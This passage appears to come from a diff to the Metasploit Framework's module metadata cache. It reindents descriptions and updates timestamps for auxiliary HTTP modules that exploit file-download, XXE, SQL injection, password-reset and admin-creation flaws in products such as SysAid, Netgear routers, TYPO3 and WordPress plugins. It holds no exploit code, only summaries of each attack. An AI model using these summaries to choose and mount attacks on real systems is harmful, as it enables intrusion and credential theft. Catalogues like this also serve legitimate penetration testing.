+    "description": "This module exploits an arbitrary file download vulnerability in CSVServlet\n          on ManageEngine NetFlow Analyzer. This module has been tested on both Windows\n          and Linux with versions 8.6 to 10.2. Note that when typing Windows paths, you\n          must escape the backslash with a backslash.",
    "references": [
      "CVE-2014-5445",
      "OSVDB-115340",
@@ -2921,7 +2995,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2023-02-08 14:30:08 +0000",
    "path": "/modules/auxiliary/admin/http/netflow_file_download.rb",
    "is_install_path": true,
    "ref_name": "admin/http/netflow_file_download",
@@ -2945,7 +3019,7 @@
    "author": [
      "Pedro Ribeiro <pedrib@gmail.com>"
    ],
-    "description": "Netgear's ProSafe NMS300 is a network management utility that runs on Windows systems.\n        The application has a file download vulnerability that can be exploited by an\n        authenticated remote attacker to download any file in the system.\n        This module has been tested with versions 1.5.0.2, 1.4.0.17 and 1.1.0.13.",
+    "description": "Netgear's ProSafe NMS300 is a network management utility that runs on Windows systems.\n          The application has a file download vulnerability that can be exploited by an\n          authenticated remote attacker to download any file in the system.\n          This module has been tested with versions 1.5.0.2, 1.4.0.17 and 1.1.0.13.",
    "references": [
      "CVE-2016-1524",
      "US-CERT-VU-777024",
@@ -2971,7 +3045,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2023-02-08 14:30:08 +0000",
    "path": "/modules/auxiliary/admin/http/netgear_auth_download.rb",
    "is_install_path": true,
    "ref_name": "admin/http/netgear_auth_download",
@@ -3084,7 +3158,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2021-08-27 17:15:33 +0000",
+    "mod_time": "2023-02-03 18:12:53 +0000",
    "path": "/modules/auxiliary/admin/http/netgear_r6700_pass_reset.rb",
    "is_install_path": true,
    "ref_name": "admin/http/netgear_r6700_pass_reset",
@@ -3097,6 +3171,9 @@
      ],
      "Stability": [
        "crash-service-down"
+      ],
+      "Reliability": [
+
      ]
    },
    "session_types": false,
@@ -3200,7 +3277,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2022-01-23 15:28:32 +0000",
+    "mod_time": "2023-02-08 14:30:08 +0000",
    "path": "/modules/auxiliary/admin/http/netgear_soap_password_extractor.rb",
    "is_install_path": true,
    "ref_name": "admin/http/netgear_soap_password_extractor",
@@ -3224,7 +3301,7 @@
    "author": [
      "Pedro Ribeiro <pedrib@gmail.com>"
    ],
-    "description": "The NETGEAR WNR2000 router has a vulnerability in the way it handles password recovery.\n        This vulnerability can be exploited by an unauthenticated attacker who is able to guess\n        the value of a certain timestamp which is in the configuration of the router.\n        Brute forcing the timestamp token might take a few minutes, a few hours, or days, but\n        it is guaranteed that it can be bruteforced.\n        This module works very reliably and it has been tested with the WNR2000v5, firmware versions\n        1.0.0.34 and 1.0.0.18. It should also work with the hardware revisions v4 and v3, but this\n        has not been tested.",
+    "description": "The NETGEAR WNR2000 router has a vulnerability in the way it handles password recovery.\n          This vulnerability can be exploited by an unauthenticated attacker who is able to guess\n          the value of a certain timestamp which is in the configuration of the router.\n          Brute forcing the timestamp token might take a few minutes, a few hours, or days, but\n          it is guaranteed that it can be bruteforced.\n          This module works very reliably and it has been tested with the WNR2000v5, firmware versions\n          1.0.0.34 and 1.0.0.18. It should also work with the hardware revisions v4 and v3, but this\n          has not been tested.",
    "references": [
      "CVE-2016-10175",
      "CVE-2016-10176",
@@ -3251,7 +3328,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2022-01-23 15:28:32 +0000",
+    "mod_time": "2023-02-08 14:30:08 +0000",
    "path": "/modules/auxiliary/admin/http/netgear_wnr2000_pass_recovery.rb",
    "is_install_path": true,
    "ref_name": "admin/http/netgear_wnr2000_pass_recovery",
@@ -3277,7 +3354,7 @@
      "Drazen Popovic <drazen.popvic@infigo.hr>",
      "Bojan Zdrnja <bojan.zdrnja@infigo.hr>"
    ],
-    "description": "Nexpose v5.7.2 and prior is vulnerable to a XML External Entity attack via a number\n        of vectors. This vulnerability can allow an attacker to a craft special XML that\n        could read arbitrary files from the filesystem. This module exploits the\n        vulnerability via the XML API.",
+    "description": "Nexpose v5.7.2 and prior is vulnerable to a XML External Entity attack via a number\n          of vectors. This vulnerability can allow an attacker to a craft special XML that\n          could read arbitrary files from the filesystem. This module exploits the\n          vulnerability via the XML API.",
    "references": [
      "URL-https://www.rapid7.com/blog/post/2013/08/16/r7-vuln-2013-07-24/"
    ],
@@ -3300,7 +3377,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2022-01-23 15:28:32 +0000",
+    "mod_time": "2023-02-08 14:30:08 +0000",
    "path": "/modules/auxiliary/admin/http/nexpose_xxe_file_read.rb",
    "is_install_path": true,
    "ref_name": "admin/http/nexpose_xxe_file_read",
@@ -3325,7 +3402,7 @@
      "Luigi Auriemma",
      "juan vazquez <juan.vazquez@metasploit.com>"
    ],
-    "description": "NFRAgent.exe in Novell File Reporter allows remote attackers to delete\n        arbitrary files via a full pathname in an SRS request with OPERATION set to 4 and\n        CMD set to 5 against /FSF/CMD. This module has been tested successfully on NFR\n        Agent 1.0.4.3 (File Reporter 1.0.2) and NFR Agent 1.0.3.22 (File Reporter 1.0.1) on\n        Windows platforms.",
+    "description": "NFRAgent.exe in Novell File Reporter allows remote attackers to delete\n          arbitrary files via a full pathname in an SRS request with OPERATION set to 4 and\n          CMD set to 5 against /FSF/CMD. This module has been tested successfully on NFR\n          Agent 1.0.4.3 (File Reporter 1.0.2) and NFR Agent 1.0.3.22 (File Reporter 1.0.1) on\n          Windows platforms.",
    "references": [
      "CVE-2011-2750",
      "OSVDB-73729",
@@ -3350,7 +3427,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2023-02-08 14:30:08 +0000",
    "path": "/modules/auxiliary/admin/http/novell_file_reporter_filedelete.rb",
    "is_install_path": true,
    "ref_name": "admin/http/novell_file_reporter_filedelete",
@@ -3374,7 +3451,7 @@
    "author": [
      "Pedro Ribeiro <pedrib@gmail.com>"
    ],
-    "description": "The NVRmini 2 Network Video Recorded and the ReadyNAS Surveillance application are vulnerable\n        to an administrator password reset on the exposed web management interface.\n        Note that this only works for unauthenticated attackers in earlier versions of the Nuuo firmware\n        (before v1.7.6), otherwise you need an administrative user password.\n        This exploit has been tested on several versions of the NVRmini 2 and the ReadyNAS Surveillance.\n        It probably also works on the NVRsolo and other Nuuo devices, but it has not been tested\n        in those devices.",
+    "description": "The NVRmini 2 Network Video Recorded and the ReadyNAS Surveillance application are vulnerable\n          to an administrator password reset on the exposed web management interface.\n          Note that this only works for unauthenticated attackers in earlier versions of the Nuuo firmware\n          (before v1.7.6), otherwise you need an administrative user password.\n          This exploit has been tested on several versions of the NVRmini 2 and the ReadyNAS Surveillance.\n          It probably also works on the NVRsolo and other Nuuo devices, but it has not been tested\n          in those devices.",
    "references": [
      "CVE-2016-5676",
      "US-CERT-VU-856152",
@@ -3400,7 +3477,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2022-01-13 18:43:41 +0000",
+    "mod_time": "2023-02-08 14:30:08 +0000",
    "path": "/modules/auxiliary/admin/http/nuuo_nvrmini_reset.rb",
    "is_install_path": true,
    "ref_name": "admin/http/nuuo_nvrmini_reset",
@@ -3424,7 +3501,7 @@
    "author": [
      "Brandon Perry <bperry.volatile@gmail.com>"
    ],
-    "description": "The Openbravo ERP XML API expands external entities which can be defined as\n        local files. This allows the user to read any files from the FS as the\n        user Openbravo is running as (generally not root).\n\n        This module was tested against Openbravo ERP version 3.0MP25 and 2.50MP6.",
+    "description": "The Openbravo ERP XML API expands external entities which can be defined as\n          local files. This allows the user to read any files from the FS as the\n          user Openbravo is running as (generally not root).\n\n          This module was tested against Openbravo ERP version 3.0MP25 and 2.50MP6.",
    "references": [
      "CVE-2013-3617",
      "OSVDB-99141",
@@ -3450,7 +3527,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2022-01-23 15:28:32 +0000",
+    "mod_time": "2023-02-08 14:30:08 +0000",
    "path": "/modules/auxiliary/admin/http/openbravo_xxe.rb",
    "is_install_path": true,
    "ref_name": "admin/http/openbravo_xxe",
@@ -3474,7 +3551,7 @@
    "author": [
      "Jan-Frederik Rieckers"
    ],
-    "description": "Postfixadmin installations between 2.91 and 3.0.1 do not check if an\n        admin is allowed to delete protected aliases. This vulnerability can be\n        used to redirect protected aliases to an other mail address. Eg. rewrite\n        the postmaster@domain alias",
+    "description": "Postfixadmin installations between 2.91 and 3.0.1 do not check if an\n          admin is allowed to delete protected aliases. This vulnerability can be\n          used to redirect protected aliases to an other mail address. Eg. rewrite\n          the postmaster@domain alias",
    "references": [
      "CVE-2017-5930",
      "URL-https://github.com/postfixadmin/postfixadmin/pull/23",
@@ -3499,7 +3576,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2021-02-17 12:33:59 +0000",
+    "mod_time": "2023-02-08 14:30:08 +0000",
    "path": "/modules/auxiliary/admin/http/pfadmin_set_protected_alias.rb",
    "is_install_path": true,
    "ref_name": "admin/http/pfadmin_set_protected_alias",
@@ -3613,7 +3690,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2023-02-08 14:30:08 +0000",
    "path": "/modules/auxiliary/admin/http/rails_devise_pass_reset.rb",
    "is_install_path": true,
    "ref_name": "admin/http/rails_devise_pass_reset",
@@ -3687,7 +3764,7 @@
      "Tanya Secker",
      "sinn3r <sinn3r@metasploit.com>"
    ],
-    "description": "This will add an administrative account to Scrutinizer NetFlow and sFlow Analyzer\n        without any authentication.  Versions such as 9.0.1 or older are affected.",
+    "description": "This will add an administrative account to Scrutinizer NetFlow and sFlow Analyzer\n          without any authentication.  Versions such as 9.0.1 or older are affected.",
    "references": [
      "CVE-2012-2626",
      "OSVDB-84318",
@@ -3712,7 +3789,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2023-02-08 14:30:08 +0000",
    "path": "/modules/auxiliary/admin/http/scrutinizer_add_user.rb",
    "is_install_path": true,
    "ref_name": "admin/http/scrutinizer_add_user",
@@ -3737,7 +3814,7 @@
      "Wolfgang Ettlingers",
      "juan vazquez <juan.vazquez@metasploit.com>"
    ],
-    "description": "This module abuses a directory traversal in Sophos Web Protection Appliance, specifically\n        on the /cgi-bin/patience.cgi component. This module has been tested successfully on the\n        Sophos Web Virtual Appliance v3.7.0.",
+    "description": "This module abuses a directory traversal in Sophos Web Protection Appliance, specifically\n          on the /cgi-bin/patience.cgi component. This module has been tested successfully on the\n          Sophos Web Virtual Appliance v3.7.0.",
    "references": [
      "CVE-2013-2641",
      "OSVDB-91953",
@@ -3765,7 +3842,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2022-01-23 15:28:32 +0000",
+    "mod_time": "2023-02-08 14:30:08 +0000",
    "path": "/modules/auxiliary/admin/http/sophos_wpa_traversal.rb",
    "is_install_path": true,
    "ref_name": "admin/http/sophos_wpa_traversal",
@@ -3790,7 +3867,7 @@
      "Dhiraj Mishra",
      "wvu <wvu@metasploit.com>"
    ],
-    "description": "This module exploits an unauthenticated remote file inclusion which\n        exists in Supra Smart Cloud TV. The media control for the device doesn't\n        have any session management or authentication. Leveraging this, an\n        attacker on the local network can send a crafted request to broadcast a\n        fake video.",
+    "description": "This module exploits an unauthenticated remote file inclusion which\n          exists in Supra Smart Cloud TV. The media control for the device doesn't\n          have any session management or authentication. Leveraging this, an\n          attacker on the local network can send a crafted request to broadcast a\n          fake video.",
    "references": [
      "CVE-2019-12477",
      "URL-https://www.inputzero.io/2019/06/hacking-smart-tv.html"
@@ -3814,7 +3891,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2022-03-10 18:03:35 +0000",
+    "mod_time": "2023-02-08 14:30:08 +0000",
    "path": "/modules/auxiliary/admin/http/supra_smart_cloud_tv_rfi.rb",
    "is_install_path": true,
    "ref_name": "admin/http/supra_smart_cloud_tv_rfi",
@@ -3838,7 +3915,7 @@
    "author": [
      "Pedro Ribeiro <pedrib@gmail.com>"
    ],
-    "description": "This module exploits a vulnerability in SysAid Help Desk that allows an unauthenticated\n        user to create an administrator account. Note that this exploit will only work once. Any\n        subsequent attempts will fail. On the other hand, the credentials must be verified\n        manually. This module has been tested on SysAid 14.4 in Windows and Linux.",
+    "description": "This module exploits a vulnerability in SysAid Help Desk that allows an unauthenticated\n          user to create an administrator account. Note that this exploit will only work once. Any\n          subsequent attempts will fail. On the other hand, the credentials must be verified\n          manually. This module has been tested on SysAid 14.4 in Windows and Linux.",
    "references": [
      "CVE-2015-2993",
      "URL-https://seclists.org/fulldisclosure/2015/Jun/8",
@@ -3863,7 +3940,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2023-02-08 14:30:08 +0000",
    "path": "/modules/auxiliary/admin/http/sysaid_admin_acct.rb",
    "is_install_path": true,
    "ref_name": "admin/http/sysaid_admin_acct",
@@ -3887,7 +3964,7 @@
    "author": [
      "Pedro Ribeiro <pedrib@gmail.com>"
    ],
-    "description": "This module exploits two vulnerabilities in SysAid Help Desk that allows\n        an unauthenticated user to download arbitrary files from the system. First, an\n        information disclosure vulnerability (CVE-2015-2997) is used to obtain the file\n        system path, and then we abuse a directory traversal (CVE-2015-2996) to download\n        the file. Note that there are some limitations on Windows, in that the information\n        disclosure vulnerability doesn't work on a Windows platform, and we can only\n        traverse the current drive (if you enter C:\\afile.txt and the server is running\n        on D:\\ the file will not be downloaded).\n\n        This module has been tested with SysAid 14.4 on Windows and Linux.",
+    "description": "This module exploits two vulnerabilities in SysAid Help Desk that allows\n          an unauthenticated user to download arbitrary files from the system. First, an\n          information disclosure vulnerability (CVE-2015-2997) is used to obtain the file\n          system path, and then we abuse a directory traversal (CVE-2015-2996) to download\n          the file. Note that there are some limitations on Windows, in that the information\n          disclosure vulnerability doesn't work on a Windows platform, and we can only\n          traverse the current drive (if you enter C:\\afile.txt and the server is running\n          on D:\\ the file will not be downloaded).\n\n          This module has been tested with SysAid 14.4 on Windows and Linux.",
    "references": [
      "CVE-2015-2996",
      "CVE-2015-2997",
@@ -3913,7 +3990,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2023-02-08 14:30:08 +0000",
    "path": "/modules/auxiliary/admin/http/sysaid_file_download.rb",
    "is_install_path": true,
    "ref_name": "admin/http/sysaid_file_download",
@@ -3937,7 +4014,7 @@
    "author": [
      "Pedro Ribeiro <pedrib@gmail.com>"
    ],
-    "description": "This module exploits a vulnerability in SysAid Help Desk that allows an unauthenticated\n        user to download arbitrary files from the system. This is used to download the server\n        configuration file that contains the database username and password, which is encrypted\n        with a fixed, known key. This module has been tested with SysAid 14.4 on Windows and Linux.",
+    "description": "This module exploits a vulnerability in SysAid Help Desk that allows an unauthenticated\n          user to download arbitrary files from the system. This is used to download the server\n          configuration file that contains the database username and password, which is encrypted\n          with a fixed, known key. This module has been tested with SysAid 14.4 on Windows and Linux.",
    "references": [
      "CVE-2015-2996",
      "CVE-2015-2998",
@@ -3963,7 +4040,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2023-02-08 14:30:08 +0000",
    "path": "/modules/auxiliary/admin/http/sysaid_sql_creds.rb",
    "is_install_path": true,
    "ref_name": "admin/http/sysaid_sql_creds",
@@ -3987,7 +4064,7 @@
    "author": [
      "Jan Rude"
    ],
-    "description": "This module exploits a vulnerability present in all versions of Telpho10 telephone system\n        appliance. This module generates a configuration backup of Telpho10,\n        downloads the file and dumps the credentials for admin login,\n        phpmyadmin, phpldapadmin, etc.\n        This module has been successfully tested on the appliance versions 2.6.31 and 2.6.39.",
+    "description": "This module exploits a vulnerability present in all versions of Telpho10 telephone system\n          appliance. This module generates a configuration backup of Telpho10,\n          downloads the file and dumps the credentials for admin login,\n          phpmyadmin, phpldapadmin, etc.\n          This module has been successfully tested on the appliance versions 2.6.31 and 2.6.39.",
    "references": [

    ],
@@ -4010,7 +4087,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2023-02-08 14:30:08 +0000",
    "path": "/modules/auxiliary/admin/http/telpho10_credential_dump.rb",
    "is_install_path": true,
    "ref_name": "admin/http/telpho10_credential_dump",
@@ -4057,7 +4134,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2018-08-21 08:50:26 +0000",
+    "mod_time": "2023-02-08 14:30:08 +0000",
    "path": "/modules/auxiliary/admin/http/tomcat_administration.rb",
    "is_install_path": true,
    "ref_name": "admin/http/tomcat_administration",
@@ -4161,7 +4238,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2022-03-10 18:03:35 +0000",
+    "mod_time": "2023-02-08 14:30:08 +0000",
    "path": "/modules/auxiliary/admin/http/tomcat_utf8_traversal.rb",
    "is_install_path": true,
    "ref_name": "admin/http/tomcat_utf8_traversal",
@@ -4214,7 +4291,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2022-03-10 18:03:35 +0000",
+    "mod_time": "2023-02-08 14:30:08 +0000",
    "path": "/modules/auxiliary/admin/http/trendmicro_dlp_traversal.rb",
    "is_install_path": true,
    "ref_name": "admin/http/trendmicro_dlp_traversal",
@@ -4239,7 +4316,7 @@
      "Marco Rivoli",
      "Charles Fol"
    ],
-    "description": "This module exploits a SQL Injection vulnerability In TYPO3 NewsController.php\n        in the news module 5.3.2 and earlier. It allows an unauthenticated user to execute arbitrary\n        SQL commands via vectors involving overwriteDemand and OrderByAllowed. The SQL injection\n        can be used to obtain password hashes for application user accounts. This module has been\n        tested on TYPO3 3.16.0 running news extension 5.0.0.\n\n        This module tries to extract username and password hash of the administrator user.\n        It tries to inject sql and check every letter of a pattern, to see\n        if it belongs to the username or password it tries to alter the ordering of results. If\n        the letter doesn't belong to the word being extracted then all results are inverted\n        (News #2 appears before News #1, so Pattern2 before Pattern1), instead if the letter belongs\n        to the word being extracted then the results are in proper order (News #1 appears before News #2,\n        so Pattern1 before Pattern2)",
+    "description": "This module exploits a SQL Injection vulnerability In TYPO3 NewsController.php\n          in the news module 5.3.2 and earlier. It allows an unauthenticated user to execute arbitrary\n          SQL commands via vectors involving overwriteDemand and OrderByAllowed. The SQL injection\n          can be used to obtain password hashes for application user accounts. This module has been\n          tested on TYPO3 3.16.0 running news extension 5.0.0.\n\n          This module tries to extract username and password hash of the administrator user.\n          It tries to inject sql and check every letter of a pattern, to see\n          if it belongs to the username or password it tries to alter the ordering of results. If\n          the letter doesn't belong to the word being extracted then all results are inverted\n          (News #2 appears before News #1, so Pattern2 before Pattern1), instead if the letter belongs\n          to the word being extracted then the results are in proper order (News #1 appears before News #2,\n          so Pattern1 before Pattern2)",
    "references": [
      "CVE-2017-7581",
      "URL-http://www.ambionics.io/blog/typo3-news-module-sqli"
@@ -4263,7 +4340,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2023-02-08 14:30:08 +0000",
    "path": "/modules/auxiliary/admin/http/typo3_news_module_sqli.rb",
    "is_install_path": true,
    "ref_name": "admin/http/typo3_news_module_sqli",
@@ -4313,7 +4390,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2018-07-12 17:34:52 +0000",
+    "mod_time": "2023-02-08 14:30:08 +0000",
    "path": "/modules/auxiliary/admin/http/typo3_sa_2009_001.rb",
    "is_install_path": true,
    "ref_name": "admin/http/typo3_sa_2009_001",
@@ -4337,7 +4414,7 @@
    "author": [
      "spinbad <spinbad.security@googlemail.com>"
    ],
-    "description": "This module exploits a file disclosure vulnerability in the jumpUrl mechanism of\n      Typo3. This flaw can be used to read any file that the web server user account has\n      access to.",
+    "description": "This module exploits a file disclosure vulnerability in the jumpUrl mechanism of\n          Typo3. This flaw can be used to read any file that the web server user account has\n          access to.",
    "references": [
      "OSVDB-52048",
      "CVE-2009-0815",
@@ -4364,7 +4441,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2023-02-08 14:30:08 +0000",
    "path": "/modules/auxiliary/admin/http/typo3_sa_2009_002.rb",
    "is_install_path": true,
    "ref_name": "admin/http/typo3_sa_2009_002",
@@ -4414,7 +4491,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2018-07-12 17:34:52 +0000",
+    "mod_time": "2023-02-08 14:30:08 +0000",
    "path": "/modules/auxiliary/admin/http/typo3_sa_2010_020.rb",
    "is_install_path": true,
    "ref_name": "admin/http/typo3_sa_2010_020",
@@ -4461,7 +4538,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2023-02-08 14:30:08 +0000",
    "path": "/modules/auxiliary/admin/http/typo3_winstaller_default_enc_keys.rb",
    "is_install_path": true,
    "ref_name": "admin/http/typo3_winstaller_default_enc_keys",
@@ -4486,7 +4563,7 @@
      "Rick Osgood",
      "Jacob Robles"
    ],
-    "description": "This module exploits a directory traversal vulnerability in Ulterius Server < v1.9.5.0\n        to download files from the affected host. A valid file path is needed to download a file.\n        Fortunately, Ulterius indexes every file on the system, which can be stored in the\n        following location:\n\n          http://ulteriusURL:port/.../fileIndex.db.\n\n        This module can download and parse the fileIndex.db file. There is also an option to\n        download a file using a provided path.",
+    "description": "This module exploits a directory traversal vulnerability in Ulterius Server < v1.9.5.0\n          to download files from the affected host. A valid file path is needed to download a file.\n          Fortunately, Ulterius indexes every file on the system, which can be stored in the\n          following location:\n\n          http://ulteriusURL:port/.../fileIndex.db.\n\n          This module can download and parse the fileIndex.db file. There is also an option to\n          download a file using a provided path.",
    "references": [
      "EDB-43141",
      "CVE-2017-16806"
@@ -4510,7 +4587,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2021-01-29 17:59:14 +0000",
+    "mod_time": "2023-02-08 14:30:08 +0000",
    "path": "/modules/auxiliary/admin/http/ulterius_file_download.rb",
    "is_install_path": true,
    "ref_name": "admin/http/ulterius_file_download",
@@ -4561,7 +4638,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2023-02-08 14:30:08 +0000",
    "path": "/modules/auxiliary/admin/http/vbulletin_upgrade_admin.rb",
    "is_install_path": true,
    "ref_name": "admin/http/vbulletin_upgrade_admin",
@@ -4585,7 +4662,7 @@
    "author": [
      "Pedro Ribeiro <pedrib@gmail.com>"
    ],
-    "description": "This module abuses two vulnerabilities in WebNMS Framework Server 5.2 to extract\nall user credentials. The first vulnerability is an unauthenticated file download\nin the FetchFile servlet, which is used to download the file containing the user\ncredentials. The second vulnerability is that the passwords in the file are\nobfuscated with a very weak algorithm which can be easily reversed.\nThis module has been tested with WebNMS Framework Server 5.2 and 5.2 SP1 on\nWindows and Linux.",
+    "description": "This module abuses two vulnerabilities in WebNMS Framework Server 5.2 to extract\n          all user credentials. The first vulnerability is an unauthenticated file download\n          in the FetchFile servlet, which is used to download the file containing the user\n          credentials. The second vulnerability is that the passwords in the file are\n          obfuscated with a very weak algorithm which can be easily reversed.\n          This module has been tested with WebNMS Framework Server 5.2 and 5.2 SP1 on\n          Windows and Linux.",
    "references": [
      "CVE-2016-6601",
      "CVE-2016-6602",
@@ -4611,7 +4688,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2023-02-08 14:30:08 +0000",
    "path": "/modules/auxiliary/admin/http/webnms_cred_disclosure.rb",
    "is_install_path": true,
    "ref_name": "admin/http/webnms_cred_disclosure",
@@ -4635,7 +4712,7 @@
    "author": [
      "Pedro Ribeiro <pedrib@gmail.com>"
    ],
-    "description": "This module abuses a vulnerability in WebNMS Framework Server 5.2 that allows an\nunauthenticated user to download files off the file system by using a directory\ntraversal attack on the FetchFile servlet.\nNote that only text files can be downloaded properly, as any binary file will get\nmangled by the servlet. Also note that for Windows targets you can only download\nfiles that are in the same drive as the WebNMS installation.\nThis module has been tested with WebNMS Framework Server 5.2 and 5.2 SP1 on\nWindows and Linux.",
+    "description": "This module abuses a vulnerability in WebNMS Framework Server 5.2 that allows an\n          unauthenticated user to download files off the file system by using a directory\n          traversal attack on the FetchFile servlet.\n          Note that only text files can be downloaded properly, as any binary file will get\n          mangled by the servlet. Also note that for Windows targets you can only download\n          files that are in the same drive as the WebNMS installation.\n          This module has been tested with WebNMS Framework Server 5.2 and 5.2 SP1 on\n          Windows and Linux.",
    "references": [
      "CVE-2016-6601",
      "URL-https://blogs.securiteam.com/index.php/archives/2712",
@@ -4660,7 +4737,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2023-02-08 14:30:08 +0000",
    "path": "/modules/auxiliary/admin/http/webnms_file_download.rb",
    "is_install_path": true,
    "ref_name": "admin/http/webnms_file_download",
@@ -4771,7 +4848,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2023-02-08 14:30:08 +0000",
    "path": "/modules/auxiliary/admin/http/wp_custom_contact_forms.rb",
    "is_install_path": true,
    "ref_name": "admin/http/wp_custom_contact_forms",
@@ -4795,7 +4872,7 @@
    "author": [
      "rastating"
    ],
-    "description": "The WordPress WP EasyCart plugin from version 1.1.30 to 3.0.20 allows authenticated\n        users of any user level to set any system option via a lack of validation in the\n        ec_ajax_update_option and ec_ajax_clear_all_taxrates functions located in\n        /inc/admin/admin_ajax_functions.php. The module first changes the admin e-mail address\n        to prevent any notifications being sent to the actual administrator during the attack,\n        re-enables user registration in case it has been disabled and sets the default role to\n        be administrator. This will allow for the user to create a new account with admin\n        privileges via the default registration page found at /wp-login.php?action=register.",
+    "description": "The WordPress WP EasyCart plugin from version 1.1.30 to 3.0.20 allows authenticated\n          users of any user level to set any system option via a lack of validation in the\n          ec_ajax_update_option and ec_ajax_clear_all_taxrates functions located in\n          /inc/admin/admin_ajax_functions.php. The module first changes the admin e-mail address\n          to prevent any notifications being sent to the actual administrator during the attack,\n          re-enables user registration in case it has been disabled and sets the default role to\n          be administrator. This will allow for the user to create a new account with admin\n          privileges via the default registration page found at /wp-login.php?action=register.",
    "references": [
      "CVE-2015-2673",
      "WPVDB-7808",
@@ -4820,7 +4897,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2023-02-08 14:30:08 +0000",
    "path": "/modules/auxiliary/admin/http/wp_easycart_privilege_escalation.rb",
    "is_install_path": true,
    "ref_name": "admin/http/wp_easycart_privilege_escalation",
@@ -4845,7 +4922,7 @@
      "Mikey Veenstra (WordFence)",
      "Thomas Labadie"
    ],
-    "description": "The Wordpress GDPR Compliance plugin <= v1.4.2 allows unauthenticated users to set\n        wordpress administration options by overwriting values within the database.\n\n        The vulnerability is present in WordPress’s admin-ajax.php, which allows unauthorized\n        users to trigger handlers and make configuration changes because of a failure to do\n        capability checks when executing the 'save_setting' internal action.\n\n        WARNING: The module sets Wordpress configuration options without reading their current\n        values and restoring them later.",
+    "description": "The Wordpress GDPR Compliance plugin <= v1.4.2 allows unauthenticated users to set\n          wordpress administration options by overwriting values within the database.\n\n          The vulnerability is present in WordPress’s admin-ajax.php, which allows unauthorized\n          users to trigger handlers and make configuration changes because of a failure to do\n          capability checks when executing the 'save_setting' internal action.\n\n          WARNING: The module sets Wordpress configuration options without reading their current\n          values and restoring them later.",
    "references": [
      "URL-https://www.wordfence.com/blog/2018/11/privilege-escalation-flaw-in-wp-gdpr-compliance-plugin-exploited-in-the-wild/",
      "CVE-2018-19207",
@@ -4870,7 +4947,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2022-06-10 14:01:57 +0000",
+    "mod_time": "2023-02-08 14:30:08 +0000",
    "path": "/modules/auxiliary/admin/http/wp_gdpr_compliance_privesc.rb",
    "is_install_path": true,
    "ref_name": "admin/http/wp_gdpr_compliance_privesc",
@@ -4927,7 +5004,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2019-04-15 07:06:27 +0000",
+    "mod_time": "2023-02-08 14:30:08 +0000",
    "path": "/modules/auxiliary/admin/http/wp_google_maps_sqli.rb",
    "is_install_path": true,
    "ref_name": "admin/http/wp_google_maps_sqli",
@@ -5012,7 +5089,7 @@
      "PizzaHatHacker",
      "Matteo Cantoni <goony@nothink.org>"
    ],
-    "description": "This module exploits a SQL injection vulnerability in the WP Symposium plugin\n        before 15.8 for WordPress, which allows remote attackers to extract credentials\n        via the size parameter to get_album_item.php.",
+    "description": "This module exploits a SQL injection vulnerability in the WP Symposium plugin\n          before 15.8 for WordPress, which allows remote attackers to extract credentials\n          via the size parameter to get_album_item.php.",
    "references": [
      "CVE-2015-6522",
      "EDB-37824"
@@ -5036,7 +5113,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2023-02-08 14:30:08 +0000",
    "path": "/modules/auxiliary/admin/http/wp_symposium_sql_injection.rb",
    "is_install_path": true,
    "ref_name": "admin/http/wp_symposium_sql_injection",
@@ -5084,7 +5161,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2023-02-08 14:30:08 +0000",
    "path": "/modules/auxiliary/admin/http/wp_wplms_privilege_escalation.rb",
    "is_install_path": true,
    "ref_name": "admin/http/wp_wplms_privilege_escalation",
@@ -5132,7 +5209,7 @@
      "https"
    ],
    "targets": null,
